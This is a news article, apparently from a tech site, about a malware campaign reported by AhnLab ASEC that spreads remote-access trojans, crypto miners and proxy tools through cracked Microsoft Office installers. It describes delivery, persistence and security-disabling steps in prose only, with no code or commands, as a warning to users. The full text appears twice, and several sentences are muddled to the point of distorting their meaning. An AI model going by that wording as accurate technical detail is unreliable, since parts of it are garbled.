Security experts are ringing alarm bells after news regarding the distribution of malware cocktails via pirated versions of Microsoft Office took center stage.
These cracked versions of Office are usually found on popular torrent websites where malware gets distributed to users commonly. The goal of threat actors seems to be linked to delivering trojans working remotely (RAT) as well as crypto miners, and those involved in downloading malware, not to mention proxy tools.
The Security Intelligence Center of AhnLab went about identifying ongoing campaigns and warned about risks linked to pirated software installations.
The news was first rolled out by research experts based in Korea who deciphered how attackers made use of several lures like Microsoft Office, Hangul Word Processor, and even Windows which are all said to be famous in Korea.
When there are cracked Microsoft Office installers involved, there is a very intricate interface that enables users to choose the variant they wish to download, which language they want to communicate in, and also which size variant to utilize.
In the background of it all, such installers end up launching malware that interacts with Telegram or Mastodon to attain valid download URLs to get more components on this front.
Such URLs help in determining how it goes directly into sources like Google Drive which is a legit source and therefore won’t trigger any kind of AV warning.
All payloads hosted on such apps entail commands for PowerShell that roll out more strains of malware into the system and then unpack those through 7Zip technology. Then the Updater feature of the malware strain registers new tasks inside the task scheduler tool of users’ PCs to make sure it arise when the system reboots.
As per reports from ASEC, there are several kinds of malware being downloaded into breached systems. This includes Orcus RAT which could give rise to remote control and enable it to get access to webcams, screenshots, and even manipulation of the system to attain data.
Next, XMRig is designed to mine out crypto and it makes use of systems that avoid being detected during the game. Other than that, 3Proxy was identified in the report which can convert breached systems inside proxy servers by opening up 3306 and adding those to legitimate processes. This way, attackers hinder traffic and infect anything coming in.
PureCrypter adds malicious payloads arising from outside sources which ensures systems stay infected despite the latest threats at hand. Last but not least, there was a discussion regarding disabling security programs by altering configurations and stopping the software from functioning in the right manner. This leaves systems vulnerable to the operations of other parts.
Even if users discover and get rid of any kind of malware highlighted above, the system carries the capability of getting it reintroduced inside via Updater modules.
Therefore, users must be careful when downloading files from inauthentic sources and as a general precaution, avoid pirated software.
So many of these types of campaigns have been arising at the forefront and they are said to embed STOP ransomware which is the most active one of the lot that targets clients.
Remember, these files in question aren’t signed digitally and therefore users are never prepared to ignore any kind of antivirus warnings when they run those. Instead, they’re used quite often to have systems infected with those malware and in the end, the whole set gets infected.
So as the old saying goes, it is better to be safe than sorry by staying informed and protected at all times.
Image: DIW-Aigen
Read next: Sam Altman Is Thinking About Restructuring OpenAI To Avail Profits Like Regular Companies
These cracked versions of Office are usually found on popular torrent websites where malware gets distributed to users commonly. The goal of threat actors seems to be linked to delivering trojans working remotely (RAT) as well as crypto miners, and those involved in downloading malware, not to mention proxy tools.
The Security Intelligence Center of AhnLab went about identifying ongoing campaigns and warned about risks linked to pirated software installations.
The news was first rolled out by research experts based in Korea who deciphered how attackers made use of several lures like Microsoft Office, Hangul Word Processor, and even Windows which are all said to be famous in Korea.
When there are cracked Microsoft Office installers involved, there is a very intricate interface that enables users to choose the variant they wish to download, which language they want to communicate in, and also which size variant to utilize.
In the background of it all, such installers end up launching malware that interacts with Telegram or Mastodon to attain valid download URLs to get more components on this front.
Such URLs help in determining how it goes directly into sources like Google Drive which is a legit source and therefore won’t trigger any kind of AV warning.
All payloads hosted on such apps entail commands for PowerShell that roll out more strains of malware into the system and then unpack those through 7Zip technology. Then the Updater feature of the malware strain registers new tasks inside the task scheduler tool of users’ PCs to make sure it arise when the system reboots.
As per reports from ASEC, there are several kinds of malware being downloaded into breached systems. This includes Orcus RAT which could give rise to remote control and enable it to get access to webcams, screenshots, and even manipulation of the system to attain data.
Next, XMRig is designed to mine out crypto and it makes use of systems that avoid being detected during the game. Other than that, 3Proxy was identified in the report which can convert breached systems inside proxy servers by opening up 3306 and adding those to legitimate processes. This way, attackers hinder traffic and infect anything coming in.
PureCrypter adds malicious payloads arising from outside sources which ensures systems stay infected despite the latest threats at hand. Last but not least, there was a discussion regarding disabling security programs by altering configurations and stopping the software from functioning in the right manner. This leaves systems vulnerable to the operations of other parts.
Even if users discover and get rid of any kind of malware highlighted above, the system carries the capability of getting it reintroduced inside via Updater modules.
Therefore, users must be careful when downloading files from inauthentic sources and as a general precaution, avoid pirated software.
So many of these types of campaigns have been arising at the forefront and they are said to embed STOP ransomware which is the most active one of the lot that targets clients.
Remember, these files in question aren’t signed digitally and therefore users are never prepared to ignore any kind of antivirus warnings when they run those. Instead, they’re used quite often to have systems infected with those malware and in the end, the whole set gets infected.
So as the old saying goes, it is better to be safe than sorry by staying informed and protected at all times.
Read next: Sam Altman Is Thinking About Restructuring OpenAI To Avail Profits Like Regular Companies
